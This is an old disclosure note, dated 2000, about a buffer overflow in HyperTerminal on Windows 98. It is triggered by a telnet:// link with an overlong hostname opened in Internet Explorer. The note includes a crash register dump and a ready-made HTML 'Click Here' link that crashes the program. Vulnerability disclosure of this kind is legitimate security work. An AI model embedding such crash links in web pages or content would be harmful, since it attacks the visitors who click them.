/\__   ____     _                            /\____     /\__ ____   
  \_  \ /  _//\_ /:\      /\   /\_ ___ /\____  \___  \    \_  |  _/   
   /   :   \/ . \ . |    (__) |   \.  )\___  \  / .)  \    /  :  \    
  /   . .   \ \_) . |    /  \ |      / (  )__) /       \  /       \   
 (   (   )   )._)   |___(    )|  .   \ /\_.  \(    :    )(    :    )  
  \__/\_/\  /_  )_____  )\  /  \__\_  )\____  )\___|_  /  \___|_  /   
          \/  \/      \/  \/        \/      \/       \/         \/  
---------------------------------------------------Meliksah Ozoral 
[E-mail meliksah@meliksah.net]------------------------------------
----------------------------------------------------[ICQ 10390761]
[telnet:// Buffer Overflow Vulnereability]------------------------
------------------------------------------------------[05/09/2000]
[www.meliksah.net]------------------------------------------------

Hi,
I don't know if this has been reported before. Windows run default telnet program when it get link like telnet://somehost in exp
lorer.
Default telnet program is HyperTerminal under Windows 98 (NOT NT).
Windows Call HyperTerminal, when I wrote telnet://www.meliksah.net in internet explorer. telnet://153 characters long hostname c
ause
buffer overflow in HyperTerminal.
        HYPERTRM caused an invalid page fault in
        module HYPERTRM.DLL at 0177:7d9fdcf4.
        Registers:
        EAX=00000065 CS=0177 EIP=7d9fdcf4 EFLGS=00010206
        EBX=00000000 SS=017f ESP=0063f8e4 EBP=0063f91c
        ECX=0063fc1c DS=017f ESI=00000065 FS=5c3f
        EDX=00000000 ES=017f EDI=00665d50 GS=7c7f
        Bytes at CS:EIP:
        8b 7e 08 8d 9f 08 01 00 00 53 ff 15 f8 86 a2 7d 
        Stack dump:
        00665d50 0066593c 00000000 7da1b94b 00000065 000006f8 0066593c 274d0010
        7d9f4222 00663900 00000002 0063f9b0 00000050 7da1ad25 0063fa00 7da1ad5e 

I didn't try ro run code by using this bug but we can use this bug on remote computers.
<p><ahref="telnet://meliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahn
etmeliksahnetmeliksahnetmeliksahnetmeliksahne">Click Here</a></p>
This URL cause crash HyperTerminal.

This bug tested on
Windows 98 [Version 4.10.1998]
Windows 98 [Version 4.10.2222]


   \___ \/ ___/  E
   /          \   L    __/\__
 _/            \_  I   \ OO /
 \     \  /     /  K   / \/ \
  \\  //\/\\  //  $    ~~\/~~
   \\ /    \\ /  A      2000
    \/      \/  H